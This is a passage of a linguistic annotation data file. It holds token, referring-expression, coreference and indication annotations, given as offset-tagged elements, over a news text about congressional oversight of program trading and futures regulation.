<desc id="1781" len="2" off="4915">D.</desc>
<desc id="1783" len="1" off="4917">,</desc>
<desc id="1785" len="5" off="4919">Mich.</desc>
<desc id="1787" len="1" off="4924">,</desc>
<desc id="1789" len="3" off="4926">the</desc>
<desc id="1791" len="4" off="4930">full</desc>
<desc id="1793" len="5" off="4935">House</desc>
<desc id="1795" len="6" off="4941">Energy</desc>
<desc id="1797" len="3" off="4948">and</desc>
<desc id="1799" len="8" off="4952">Commerce</desc>
<desc id="1801" len="9" off="4962">Committee</desc>
<desc id="1803" len="8" off="4972">chairman</desc>
<desc id="1805" len="1" off="4980">,</desc>
<desc id="1807" len="3" off="4982">who</desc>
<desc id="1809" len="3" off="4986">has</desc>
<desc id="1811" len="4" off="4990">been</desc>
<desc id="1813" len="7" off="4995">willing</desc>
<desc id="1815" len="2" off="5003">to</desc>
<desc id="1817" len="3" off="5006">let</desc>
<desc id="1819" len="3" off="5010">Mr.</desc>
<desc id="1821" len="6" off="5014">Markey</desc>
<desc id="1823" len="5" off="5021">carry</desc>
<desc id="1825" len="3" off="5027">the</desc>
<desc id="1827" len="11" off="5031">legislation</desc>
<desc id="1829" len="2" off="5043">in</desc>
<desc id="1831" len="6" off="5046">recent</desc>
<desc id="1833" len="6" off="5054">months</desc>
<desc id="1835" len="1" off="5060">.</desc>
<desc id="1838" len="3" off="5062">Mr.</desc>
<desc id="1840" len="7" off="5066">Dingell</desc>
<desc id="1842" len="9" off="5074">expressed</desc>
<desc id="1844" len="7" off="5084">concern</desc>
<desc id="1846" len="1" off="5091">,</desc>
<desc id="1848" len="7" off="5093">sources</desc>
<desc id="1850" len="4" off="5101">said</desc>
<desc id="1852" len="1" off="5105">,</desc>
<desc id="1854" len="5" off="5107">about</desc>
<desc id="1856" len="14" off="5113">jurisdictional</desc>
<desc id="1858" len="8" off="5128">problems</desc>
<desc id="1860" len="2" off="5137">in</desc>
<desc id="1862" len="10" off="5141">regulating</desc>
<desc id="1864" len="7" off="5152">program</desc>
<desc id="1866" len="7" off="5160">trading</desc>
<desc id="1868" len="1" off="5167">,</desc>
<desc id="1870" len="5" off="5169">which</desc>
<desc id="1872" len="4" off="5175">uses</desc>
<desc id="1874" len="7" off="5180">futures</desc>
<desc id="1876" len="2" off="5188">to</desc>
<desc id="1878" len="6" off="5191">offset</desc>
<desc id="1880" len="5" off="5198">stock</desc>
<desc id="1882" len="6" off="5204">trades</desc>
<desc id="1884" len="1" off="5210">.</desc>
<desc id="1887" len="3" off="5212">The</desc>
<desc id="1889" len="7" off="5216">futures</desc>
<desc id="1891" len="8" off="5224">industry</desc>
<desc id="1893" len="2" off="5234">is</desc>
<desc id="1895" len="9" off="5237">regulated</desc>
<desc id="1897" len="2" off="5247">by</desc>
<desc id="1899" len="3" off="5250">the</desc>
<desc id="1901" len="9" off="5254">Commodity</desc>
<desc id="1903" len="7" off="5264">Futures</desc>
<desc id="1905" len="7" off="5272">Trading</desc>
<desc id="1907" len="10" off="5280">Commission</desc>
<desc id="1909" len="1" off="5290">,</desc>
<desc id="1911" len="5" off="5292">which</desc>
<desc id="1913" len="7" off="5298">reports</desc>
<desc id="1915" len="2" off="5306">to</desc>
<desc id="1917" len="3" off="5309">the</desc>
<desc id="1919" len="11" off="5313">Agriculture</desc>
<desc id="1921" len="10" off="5326">committees</desc>
<desc id="1923" len="2" off="5337">in</desc>
<desc id="1925" len="4" off="5340">both</desc>
<desc id="1927" len="6" off="5345">houses</desc>
<desc id="1929" len="1" off="5351">.</desc>
</rep>
<rep id="edu.mit.discourse.rep.refexp">
<desc id="3289" len="31" off="0">2~4~6~8</desc>
<desc id="3290" len="2" off="37">12</desc>
<desc id="3291" len="66" off="59">20~22~24~26~28~30~32~34~36~38~40</desc>
<desc id="3292" len="13" off="112">38~40</desc>
<desc id="3293" len="12" off="139">49~51</desc>
<desc id="3294" len="35" off="157">55~57~59~61~63</desc>
<desc id="3295" len="10" off="196">67</desc>
<desc id="3296" len="2" off="212">71</desc>
<desc id="3297" len="34" off="230">77~79~81~83</desc>
<desc id="3298" len="86" off="230">77~79~81~83~85~87~89~91~93~95~97</desc>
<desc id="3299" len="15" off="274">89~91</desc>
<desc id="3300" len="18" off="298">95~97</desc>
<desc id="3301" len="36" off="322">104~106~108~110~112~114</desc>
<desc id="3302" len="23" off="326">106~108~110~112</desc>
<desc id="3303" len="2" off="365">118</desc>
<desc id="3304" len="31" off="396">128~130~132~134~136~138~140</desc>
<desc id="3305" len="15" off="412">138~140</desc>
<desc id="3306" len="5" off="443">148</desc>
<desc id="3307" len="12" off="466">156~158~160</desc>
<desc id="3308" len="16" off="480">165~167~169</desc>
<desc id="3309" len="27" off="502">173~175~177~179~181</desc>
<desc id="3310" len="3" off="551">191</desc>
<desc id="3311" len="50" off="551">191~193~195~197~199~201~203~205~207</desc>
<desc id="3312" len="34" off="555">193~195~197~199~201~203</desc>
<desc id="3313" len="42" off="555">193~195~197~199~201~203~205</desc>
<desc id="3314" len="7" off="607">211~213</desc>
<desc id="3315" len="15" off="607">211~213~215</desc>
<desc id="3316" len="96" off="628">219~221~223~225~227~229~231~233~235~237~239~241~243~245~247~249~251</desc>
<desc id="3317" len="58" off="666">233~235~237~239~241~243~245~247~249~251</desc>
<desc id="3318" len="32" off="692">243~245~247~249~251</desc>
<desc id="3319" len="18" off="730">258~260~262</desc>
<desc id="3320" len="22" off="768">270~272~274~276~278</desc>
<desc id="3321" len="7" off="778">276</desc>
<desc id="3322" len="12" off="778">276~278</desc>
<desc id="3323" len="2" off="792">282</desc>
<desc id="3324" len="40" off="825">294~296~298~300~302~304~306~308~310</desc>
<desc id="3325" len="10" off="871">315~317</desc>
<desc id="3326" len="7" off="893">325</desc>
<desc id="3327" len="6" off="926">337</desc>
<desc id="3328" len="16" off="936">341~343~345</desc>
<desc id="3329" len="16" off="956">349~351~353</desc>
<desc id="3330" len="2" off="988">363</desc>
<desc id="3331" len="12" off="992">368~370</desc>
<desc id="3332" len="2" off="1010">374</desc>
<desc id="3333" len="19" off="1024">380~382~384</desc>
<desc id="3334" len="187" off="1065">392~394~396~398~400~402~404~406~408~410~412~414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3335" len="175" off="1077">398~400~402~404~406~408~410~412~414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3336" len="6" off="1104">406</desc>
<desc id="3337" len="19" off="1115">410~412</desc>
<desc id="3338" len="114" off="1138">416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3339" len="26" off="1159">426~428~430~432</desc>
<desc id="3340" len="10" off="1194">436~438</desc>
<desc id="3341" len="19" off="1209">442~444</desc>
<desc id="3342" len="26" off="1209">442~444~446</desc>
<desc id="3343" len="19" off="1254">457~459~461</desc>
<desc id="3344" len="40" off="1274">463~465~467~469~471~473</desc>
<desc id="3345" len="19" off="1278">465~467~469</desc>
<desc id="3346" len="27" off="1278">465~467~469~471</desc>
<desc id="3347" len="26" off="1321">477~479~481~483~485~487</desc>
<desc id="3348" len="28" off="1357">493~495~497~499~501</desc>
<desc id="3349" len="4" off="1359">495</desc>
<desc id="3350" len="31" off="1415">513~515~517~519~521~523</desc>
<desc id="3351" len="15" off="1431">521~523</desc>
<desc id="3352" len="8" off="1448">528~530</desc>
<desc id="3353" len="3" off="1468">536</desc>
<desc id="3354" len="73" off="1472">538~540~542~544~546~548~550~552~554~556~558</desc>
<desc id="3355" len="35" off="1510">550~552~554~556~558</desc>
<desc id="3356" len="16" off="1558">564~566~568</desc>
<desc id="3357" len="25" off="1578">572~574~576~578</desc>
<desc id="3358" len="7" off="1626">588~590</desc>
<desc id="3359" len="46" off="1658">605~607~609~611~613~615~617</desc>
<desc id="3360" len="4" off="1671">611</desc>
<desc id="3361" len="24" off="1671">611~613~615</desc>
<desc id="3362" len="18" off="1717">625~627~629</desc>
<desc id="3363" len="25" off="1755">637~639~641~643~645</desc>
<desc id="3364" len="7" off="1773">643~645</desc>
<desc id="3365" len="12" off="1792">654~656</desc>
<desc id="3366" len="97" off="1815">662~664~666~668~670~672~674~676~678~680~682~684~686~688~690~692</desc>
<desc id="3367" len="12" off="1873">680~682</desc>
<desc id="3368" len="18" off="1894">688~690~692</desc>
<desc id="3369" len="8" off="1898">690</desc>
<desc id="3370" len="36" off="1928">698~700~702~704~706~708</desc>
<desc id="3371" len="5" off="1989">720</desc>
<desc id="3372" len="37" off="1989">720~722~724~726~728</desc>
<desc id="3373" len="20" off="1999">724~726</desc>
<desc id="3374" len="15" off="2041">735~737</desc>
<desc id="3375" len="8" off="2073">743~745</desc>
<desc id="3376" len="36" off="2073">743~745~747~749~751</desc>
<desc id="3377" len="20" off="2125">757~759~761~763</desc>
<desc id="3378" len="7" off="2138">761~763</desc>
<desc id="3379" len="28" off="2159">769~771~773</desc>
<desc id="3380" len="40" off="2191">777~779~781~783~785~787~789~791</desc>
<desc id="3381" len="27" off="2204">783~785~787~789~791</desc>
<desc id="3382" len="18" off="2233">796~798~800~802</desc>
<desc id="3383" len="19" off="2261">806~808</desc>
<desc id="3384" len="5" off="2282">812</desc>
<desc id="3385" len="12" off="2309">823~825</desc>
<desc id="3386" len="103" off="2338">833~835~837~839~841~843~845~847~849~851~853~855~857~859~861</desc>
<desc id="3387" len="19" off="2398">851~853~855</desc>
<desc id="3388" len="16" off="2425">859~861</desc>
<desc id="3389" len="25" off="2455">869~871~873~875</desc>
<desc id="3390" len="41" off="2485">879~881~883~885~887~889</desc>
<desc id="3391" len="19" off="2490">881~883~885</desc>
<desc id="3392" len="27" off="2490">881~883~885~887</desc>
<desc id="3393" len="17" off="2528">893~895~897</desc>
<desc id="3394" len="15" off="2553">903~905~907</desc>
<desc id="3395" len="18" off="2573">914~916</desc>
<desc id="3396" len="28" off="2604">924~926~928~930</desc>
<desc id="3397" len="12" off="2637">934~936</desc>
<desc id="3398" len="8" off="2652">941~943</desc>
<desc id="3399" len="21" off="2666">947~949~951</desc>
<desc id="3400" len="32" off="2714">963~965~967~969~971~973</desc>
<desc id="3401" len="9" off="2748">978~980</desc>
<desc id="3402" len="22" off="2771">986~988~990</desc>
<desc id="3403" len="9" off="2797">994</desc>
<desc id="3404" len="15" off="2820">1000~1002~1004</desc>
<desc id="3405" len="33" off="2843">1008~1010~1012~1014~1016~1018</desc>
<desc id="3406" len="10" off="2881">1025</desc>
<desc id="3407" len="5" off="2893">1029</desc>
<desc id="3408" len="12" off="2893">1029~1031</desc>
<desc id="3409" len="10" off="2911">1035~1037</desc>
<desc id="3410" len="11" off="2927">1041</desc>
<desc id="3411" len="128" off="2944">1045~1047~1049~1051~1053~1055~1057~1059~1061~1063~1065~1067~1069~1071~1073~1075~1077~1079~1081~1083~1085~1087</desc>
<desc id="3412" len="48" off="2969">1055~1057~1059~1061~1063~1065~1067~1069</desc>
<desc id="3413" len="13" off="2993">1061~1063~1065</desc>
<desc id="3414" len="24" off="2993">1061~1063~1065~1067~1069</desc>
<desc id="3415" len="32" off="3023">1073~1075~1077~1079~1081</desc>
<desc id="3416" len="10" off="3062">1085~1087</desc>
<desc id="3417" len="2" off="3092">1102</desc>
<desc id="3418" len="5" off="3105">1108</desc>
<desc id="3419" len="10" off="3128">1116~1118</desc>
<desc id="3420" len="6" off="3153">1124</desc>
<desc id="3421" len="30" off="3173">1133~1135~1137~1139</desc>
<desc id="3422" len="71" off="3205">1143~1145~1147~1149~1151~1153~1155~1157~1159~1161~1163</desc>
<desc id="3423" len="31" off="3245">1157~1159~1161~1163</desc>
<desc id="3424" len="17" off="3259">1161~1163</desc>
<desc id="3425" len="2" off="3283">1169</desc>
<desc id="3426" len="54" off="3291">1173~1175~1177~1179~1181~1183</desc>
<desc id="3427" len="5" off="3295">1175</desc>
<desc id="3428" len="2" off="3351">1187</desc>
<desc id="3429" len="33" off="3368">1193~1195~1197~1199</desc>
<desc id="3430" len="7" off="3415">1205~1207</desc>
<desc id="3431" len="12" off="3449">1217~1219</desc>
<desc id="3432" len="6" off="3467">1225~1227</desc>
<desc id="3433" len="26" off="3475">1232~1234~1236</desc>
<desc id="3434" len="12" off="3519">1246~1248</desc>
<desc id="3435" len="11" off="3544">1258~1260</desc>
<desc id="3436" len="19" off="3562">1266~1268</desc>
<desc id="3437" len="7" off="3596">1276~1278</desc>
<desc id="3438" len="69" off="3604">1280~1282~1284~1286~1288~1290~1292~1294~1296~1298~1300~1302</desc>
<desc id="3439" len="12" off="3626">1290~1292</desc>
<desc id="3440" len="7" off="3645">1296</desc>
<desc id="3441" len="3" off="3675">1307</desc>
<desc id="3442" len="28" off="3675">1307~1309~1311~1313</desc>
<desc id="3443" len="2" off="3713">1319</desc>
<desc id="3444" len="48" off="3746">1331~1333~1335~1337~1339~1341~1343</desc>
<desc id="3445" len="21" off="3773">1339~1341~1343</desc>
<desc id="3446" len="2" off="3800">1349</desc>
<desc id="3447" len="19" off="3817">1357~1359</desc>
<desc id="3448" len="8" off="3845">1365</desc>
<desc id="3449" len="12" off="3855">1370~1372~1374</desc>
<desc id="3450" len="5" off="3857">1372</desc>
<desc id="3451" len="10" off="3883">1380~1382</desc>
<desc id="3452" len="19" off="3934">1404~1406~1408~1410</desc>
<desc id="3453" len="5" off="3954">1412</desc>
<desc id="3454" len="24" off="3960">1414~1416~1418~1420</desc>
<desc id="3455" len="9" off="4022">1441~1443</desc>
<desc id="3456" len="10" off="4033">1447~1449</desc>
<desc id="3457" len="16" off="4052">1453~1455</desc>
<desc id="3458" len="58" off="4052">1453~1455~1457~1459~1461~1463~1465~1467~1469~1471~1473</desc>
<desc id="3459" len="57" off="4137">1487~1489~1491~1493~1495~1497~1499~1501~1503</desc>
<desc id="3460" len="22" off="4172">1499~1501~1503</desc>
<desc id="3461" len="6" off="4198">1510</desc>
<desc id="3462" len="2" off="4210">1514</desc>
<desc id="3463" len="4" off="4229">1522</desc>
<desc id="3464" len="31" off="4255">1532~1534~1536~1538</desc>
<desc id="3465" len="8" off="4302">1546~1548</desc>
<desc id="3466" len="10" off="4317">1555~1557</desc>
<desc id="3467" len="2" off="4349">1565</desc>
<desc id="3468" len="8" off="4387">1579~1581</desc>
<desc id="3469" len="9" off="4399">1585~1587</desc>
<desc id="3470" len="8" off="4410">1591~1593</desc>
<desc id="3471" len="32" off="4430">1602~1604~1606~1608~1610</desc>
<desc id="3472" len="11" off="4451">1608~1610</desc>
<desc id="3473" len="11" off="4464">1614~1616</desc>
<desc id="3474" len="10" off="4482">1620~1622</desc>
<desc id="3475" len="33" off="4521">1634~1636~1638~1640~1642~1644</desc>
<desc id="3476" len="17" off="4523">1636~1638~1640</desc>
<desc id="3477" len="23" off="4523">1636~1638~1640~1642</desc>
<desc id="3478" len="5" off="4555">1646</desc>
<desc id="3479" len="10" off="4562">1651~1653</desc>
<desc id="3480" len="13" off="4578">1657~1659~1661</desc>
<desc id="3481" len="25" off="4612">1671~1673~1675</desc>
<desc id="3482" len="13" off="4639">1680~1682</desc>
<desc id="3483" len="11" off="4661">1686~1688</desc>
<desc id="3484" len="11" off="4674">1692~1694</desc>
<desc id="3485" len="15" off="4697">1702~1704</desc>
<desc id="3486" len="27" off="4746">1718~1720~1722~1724~1726</desc>
<desc id="3487" len="9" off="4764">1724~1726</desc>
<desc id="3488" len="29" off="4791">1736~1738~1740~1742~1744~1746</desc>
<desc id="3489" len="10" off="4810">1744~1746</desc>
<desc id="3490" len="38" off="4822">1751~1753~1755~1757~1759~1761</desc>
<desc id="3491" len="27" off="4833">1755~1757~1759~1761</desc>
<desc id="3492" len="12" off="4870">1765~1767</desc>
<desc id="3493" len="163" off="4897">1775~1777~1779~1781~1783~1785~1787~1789~1791~1793~1795~1797~1799~1801~1803~1805~1807~1809~1811~1813~1815~1817~1819~1821~1823~1825~1827~1829~1831~1833</desc>
<desc id="3494" len="5" off="4935">1793</desc>
<desc id="3495" len="36" off="4935">1793~1795~1797~1799~1801</desc>
<desc id="3496" len="10" off="5010">1819~1821</desc>
<desc id="3497" len="15" off="5027">1825~1827</desc>
<desc id="3498" len="14" off="5046">1831~1833</desc>
<desc id="3499" len="11" off="5062">1838~1840</desc>
<desc id="3500" len="7" off="5084">1844</desc>
<desc id="3501" len="7" off="5093">1848</desc>
<desc id="3502" len="97" off="5113">1856~1858~1860~1862~1864~1866~1868~1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3503" len="58" off="5152">1864~1866~1868~1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3504" len="7" off="5180">1874</desc>
<desc id="3505" len="12" off="5198">1880~1882</desc>
<desc id="3506" len="20" off="5212">1887~1889~1891</desc>
<desc id="3507" len="7" off="5216">1889</desc>
<desc id="3508" len="101" off="5250">1899~1901~1903~1905~1907~1909~1911~1913~1915~1917~1919~1921~1923~1925~1927</desc>
<desc id="3509" len="27" off="5309">1917~1919~1921</desc>
<desc id="3510" len="11" off="5340">1925~1927</desc>
</rep>
<rep id="edu.mit.discourse.rep.coref">
<desc id="3511" len="2660" off="0">Redacted|3289,3290,3291,3292,3293,3294,3295,3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311,3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327,3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343,3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359,3360,3361,3362,3363,3364,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374,3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,3388,3389,3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405,3406,3407,3408,3409,3410,3411,3412,3413,3414,3415,3416,3417,3418,3419,3420,3421,3422,3423,3424,3425,3426,3427,3428,3429,3430,3431,3432,3433,3434,3435,3436,3437,3438,3439,3440,3441,3442,3443,3444,3445,3446,3447,3448,3449,3450,3451,3452,3453,3454,3455,3456,3457,3458,3459,3460,3461,3462,3463,3464,3465,3466,3467,3468,3469,3470,3471,3472,3473,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486,3487,3488,3489,3490,3491,3492,3493,3494,3495,3496,3497,3498,3499,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510</desc>
</rep>
<rep id="es.ucm.nil.indication.rep.indication">
<desc id="3621" len="31" off="0">3289|MOD:DIST:2|NUC:DIST:4~6~8</desc>
<desc id="3622" len="2" off="37">3290|NUC:DIST:12</desc>
<desc id="3623" len="66" off="59">3291|MOD:DIST:20|MOD:DIST:22|NUC:DESC:26~28|MOD:DIST:32~34~36~38~40</desc>
<desc id="3624" len="13" off="112">3292|MOD:DIST:38|NUC:DIST:40</desc>
<desc id="3625" len="12" off="139">3293|NUC:DIST:49~51</desc>
<desc id="3626" len="35" off="157">3294|MOD:DIST:55|MOD:DESC:57|MOD:DIST:59|MOD:DIST:61|NUC:DIST:63</desc>
<desc id="3627" len="10" off="196">3295|NUC:DIST:67</desc>
<desc id="3628" len="2" off="212">3296|NUC:DIST:71</desc>
<desc id="3629" len="34" off="230">3297|NUC:DIST:77~79~81~83</desc>
<desc id="3630" len="86" off="230">3298|MOD:DIST:77~79~81~83|NUC:DESC:85|MOD:DIST:87~89~91~93~95~97</desc>
<desc id="3631" len="15" off="274">3299|MOD:DIST:89|NUC:DIST:91</desc>
<desc id="3632" len="18" off="298">3300|MOD:DIST:95|NUC:DIST:97</desc>
<desc id="3633" len="36" off="322">3301|MOD:DIST:104|MOD:DIST:106~108~110~112|NUC:DESC:114</desc>
<desc id="3634" len="23" off="326">3302|NUC:DIST:106~108~110~112</desc>
<desc id="3635" len="2" off="365">3303|NUC:DIST:118</desc>
<desc id="3636" len="31" off="396">3304|MOD:DIST:128|NUC:DESC:132|MOD:DIST:136~138~140</desc>
<desc id="3637" len="15" off="412">3305|MOD:DIST:138|NUC:DIST:140</desc>
<desc id="3638" len="5" off="443">3306|NUC:DIST:148</desc>
<desc id="3639" len="12" off="466">3307|MOD:DIST:156|MOD:DIST:158|NUC:DIST:160</desc>
<desc id="3640" len="16" off="480">3308|MOD:DIST:165|MOD:DESC:167|NUC:DIST:169</desc>
<desc id="3641" len="27" off="502">3309|MOD:DIST:173|MOD:DESC:175|MOD:DIST:177|MOD:DIST:179|NUC:DIST:181</desc>
<desc id="3642" len="3" off="551">3310|NUC:DIST:191</desc>
<desc id="3643" len="50" off="551">3311|MOD:DIST:191|MOD:DIST:193~195~197~199~201~203~205|NUC:DESC:207</desc>
<desc id="3644" len="34" off="555">3312|MOD:DIST:193~195~197~199~201|NUC:DIST:203</desc>
<desc id="3645" len="42" off="555">3313|MOD:DIST:193~195~197~199~201~203|NUC:DIST:205</desc>
<desc id="3646" len="7" off="607">3314|NUC:DIST:211~213</desc>
<desc id="3647" len="15" off="607">3315|MOD:DIST:211~213|NUC:DIST:215</desc>
<desc id="3648" len="96" off="628">3316|MOD:DIST:219|MOD:DIST:221|NUC:DIST:223|MOD:DESC:227~229~231~233~235~237~239~241~243~245~247~249~251</desc>
<desc id="3649" len="58" off="666">3317|MOD:DIST:233~235|MOD:DIST:237|NUC:DIST:239|MOD:DIST:241~243~245~247~249~251</desc>
<desc id="3650" len="32" off="692">3318|MOD:DIST:243|NUC:DIST:245~247~249~251</desc>
<desc id="3651" len="18" off="730">3319|MOD:DIST:258|MOD:DIST:260|NUC:DIST:262</desc>
<desc id="3652" len="22" off="768">3320|NUC:DIST:270~272~274|MOD:DIST:276~278</desc>
<desc id="3653" len="7" off="778">3321|NUC:DIST:276</desc>
<desc id="3654" len="12" off="778">3322|MOD:DIST:276|NUC:DIST:278</desc>
<desc id="3655" len="2" off="792">3323|NUC:DIST:282</desc>
<desc id="3656" len="40" off="825">3324|MOD:DIST:294|MOD:DIST:296|NUC:DIST:298|MOD:DIST:300~302|MOD:DESC:304~306~308~310</desc>
<desc id="3657" len="10" off="871">3325|MOD:DIST:315|NUC:DIST:317</desc>
<desc id="3658" len="7" off="893">3326|NUC:DIST:325</desc>
<desc id="3659" len="6" off="926">3327|NUC:DIST:337</desc>
<desc id="3660" len="16" off="936">3328|MOD:DIST:341|MOD:DIST:343|NUC:DIST:345</desc>
<desc id="3661" len="16" off="956">3329|MOD:DIST:349|MOD:DIST:351|NUC:DIST:353</desc>
<desc id="3662" len="2" off="988">3330|NUC:DIST:363</desc>
<desc id="3663" len="12" off="992">3331|MOD:DIST:368|NUC:DIST:370</desc>
<desc id="3664" len="2" off="1010">3332|NUC:DIST:374</desc>
<desc id="3665" len="19" off="1024">3333|MOD:DIST:380|NUC:DESC:382~384</desc>
<desc id="3666" len="187" off="1065">3334|MOD:DIST:392|NUC:DIST:394|MOD:DIST:396~398~400~402~404~406~408~410~412~414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3667" len="175" off="1077">3335|MOD:DIST:398|MOD:DESC:400|NUC:DIST:402|MOD:DIST:404~406~408~410~412|MOD:DIST:414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3668" len="6" off="1104">3336|NUC:DIST:406</desc>
<desc id="3669" len="19" off="1115">3337|MOD:DIST:410|NUC:DIST:412</desc>
<desc id="3670" len="114" off="1138">3338|MOD:DIST:416|NUC:DIST:418~420|MOD:DESC:424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3671" len="26" off="1159">3339|MOD:DIST:426|NUC:DIST:428~430~432</desc>
<desc id="3672" len="10" off="1194">3340|MOD:DIST:436|NUC:DIST:438</desc>
<desc id="3673" len="19" off="1209">3341|MOD:DIST:442|NUC:DIST:444</desc>
<desc id="3674" len="26" off="1209">3342|MOD:DIST:442~444|NUC:DIST:446</desc>
<desc id="3675" len="19" off="1254">3343|MOD:DIST:457|MOD:DIST:459|NUC:DIST:461</desc>
<desc id="3676" len="40" off="1274">3344|MOD:DIST:463|MOD:DIST:465~467~469~471|NUC:DIST:473</desc>
<desc id="3677" len="19" off="1278">3345|MOD:DIST:465~467|NUC:DIST:469</desc>
<desc id="3678" len="27" off="1278">3346|MOD:DIST:465~467~469|NUC:DIST:471</desc>
<desc id="3679" len="26" off="1321">3347|MOD:DESC:477~479~481~483|MOD:DIST:485|NUC:DIST:487</desc>
<desc id="3680" len="28" off="1357">3348|MOD:DIST:493|MOD:DIST:495|MOD:DIST:497~499|NUC:DIST:501</desc>
<desc id="3681" len="4" off="1359">3349|NUC:DIST:495</desc>
<desc id="3682" len="31" off="1415">3350|MOD:DIST:513|NUC:DIST:515|MOD:DIST:517~519~521~523</desc>
<desc id="3683" len="15" off="1431">3351|MOD:DIST:521|NUC:DIST:523</desc>
<desc id="3684" len="8" off="1448">3352|MOD:DIST:528|NUC:DIST:530</desc>
<desc id="3685" len="3" off="1468">3353|NUC:DIST:536</desc>
<desc id="3686" len="73" off="1472">3354|MOD:DESC:538|MOD:DIST:540|MOD:DIST:544|NUC:DIST:546|MOD:DIST:548~550~552~554~556~558</desc>
<desc id="3687" len="35" off="1510">3355|MOD:DIST:550~552|MOD:DIST:554|MOD:DIST:556|NUC:DIST:558</desc>
<desc id="3688" len="16" off="1558">3356|MOD:DIST:564~566|NUC:DIST:568</desc>
<desc id="3689" len="25" off="1578">3357|MOD:DIST:572|NUC:DIST:574~576~578</desc>
<desc id="3690" len="7" off="1626">3358|NUC:DIST:588~590</desc>
<desc id="3691" len="46" off="1658">3359|NUC:DIST:605~607|MOD:DESC:611~613~615~617</desc>
<desc id="3692" len="4" off="1671">3360|NUC:DIST:611</desc>
<desc id="3693" len="24" off="1671">3361|MOD:DIST:611|MOD:DIST:613|NUC:DIST:615</desc>
<desc id="3694" len="18" off="1717">3362|MOD:DIST:625|MOD:DIST:627|NUC:DIST:629</desc>
<desc id="3695" len="25" off="1755">3363|MOD:DIST:637|MOD:DIST:639|NUC:DIST:641|MOD:DIST:643~645</desc>
<desc id="3696" len="7" off="1773">3364|NUC:DIST:643~645</desc>
<desc id="3697" len="12" off="1792">3365|MOD:DIST:654|NUC:DIST:656</desc>
<desc id="3698" len="97" off="1815">3366|MOD:DIST:662|MOD:DIST:664|NUC:DESC:666|MOD:DIST:668~670~672~674~676~678~680~682~684~686~688~690~692</desc>
<desc id="3699" len="12" off="1873">3367|MOD:DIST:680|NUC:DIST:682</desc>
<desc id="3700" len="18" off="1894">3368|MOD:DIST:688|MOD:DIST:690|NUC:DIST:692</desc>
<desc id="3701" len="8" off="1898">3369|NUC:DIST:690</desc>
<desc id="3702" len="36" off="1928">3370|MOD:DIST:698|MOD:DESC:700|NUC:DIST:702|MOD:DIST:704~706~708</desc>
<desc id="3703" len="5" off="1989">3371|NUC:DIST:720</desc>
<desc id="3704" len="37" off="1989">3372|MOD:DIST:720~722~724~726|NUC:DIST:728</desc>
<desc id="3705" len="20" off="1999">3373|MOD:DIST:724|NUC:DIST:726</desc>
<desc id="3706" len="15" off="2041">3374|MOD:DIST:735|NUC:DIST:737</desc>
<desc id="3707" len="8" off="2073">3375|MOD:DIST:743|NUC:DIST:745</desc>
<desc id="3708" len="36" off="2073">3376|MOD:DIST:743~745~747|MOD:DIST:749|NUC:DIST:751</desc>
<desc id="3709" len="20" off="2125">3377|MOD:DIST:757|NUC:DESC:759|MOD:DIST:761~763</desc>
<desc id="3710" len="7" off="2138">3378|NUC:DIST:761~763</desc>
<desc id="3711" len="28" off="2159">3379|MOD:DIST:769|MOD:DIST:771|NUC:DIST:773</desc>
<desc id="3712" len="40" off="2191">3380|MOD:DIST:777|NUC:DIST:779|MOD:DIST:781~783~785~787~789~791</desc>
<desc id="3713" len="27" off="2204">3381|MOD:DIST:783|NUC:DIST:785~787~789~791</desc>
<desc id="3714" len="18" off="2233">3382|MOD:DIST:796~798|MOD:DIST:800|NUC:DIST:802</desc>
<desc id="3715" len="19" off="2261">3383|MOD:DIST:806|NUC:DIST:808</desc>
<desc id="3716" len="5" off="2282">3384|NUC:DIST:812</desc>
<desc id="3717" len="12" off="2309">3385|MOD:DIST:823|NUC:DIST:825</desc>
<desc id="3718" len="103" off="2338">3386|MOD:DIST:833|MOD:DIST:835|NUC:DIST:837~839|MOD:DIST:843~845~847~849~851~853~855~857~859~861</desc>
<desc id="3719" len="19" off="2398">3387|MOD:DIST:851|MOD:DIST:853|NUC:DIST:855</desc>
<desc id="3720" len="16" off="2425">3388|MOD:DIST:859|NUC:DIST:861</desc>
<desc id="3721" len="25" off="2455">3389|MOD:DIST:869|MOD:DIST:871|MOD:DIST:873|NUC:DIST:875</desc>
<desc id="3722" len="41" off="2485">3390|MOD:DIST:879|MOD:DIST:881~883~885~887|NUC:DIST:889</desc>
<desc id="3723" len="19" off="2490">3391|MOD:DIST:881~883|NUC:DIST:885</desc>
<desc id="3724" len="27" off="2490">3392|MOD:DIST:881~883~885|NUC:DIST:887</desc>
<desc id="3725" len="17" off="2528">3393|MOD:DIST:893|MOD:DIST:895|NUC:DIST:897</desc>
<desc id="3726" len="15" off="2553">3394|MOD:DIST:903|MOD:DIST:905|NUC:DIST:907</desc>
<desc id="3727" len="18" off="2573">3395|MOD:DIST:914|NUC:DIST:916</desc>
<desc id="3728" len="28" off="2604">3396|MOD:DIST:924|MOD:DIST:926|MOD:DIST:928|NUC:DIST:930</desc>
<desc id="3729" len="12" off="2637">3397|MOD:DIST:934|NUC:DIST:936</desc>
<desc id="3730" len="8" off="2652">3398|MOD:DIST:941|NUC:DIST:943</desc>
<desc id="3731" len="21" off="2666">3399|MOD:DIST:947|MOD:DESC:949|NUC:DIST:951</desc>
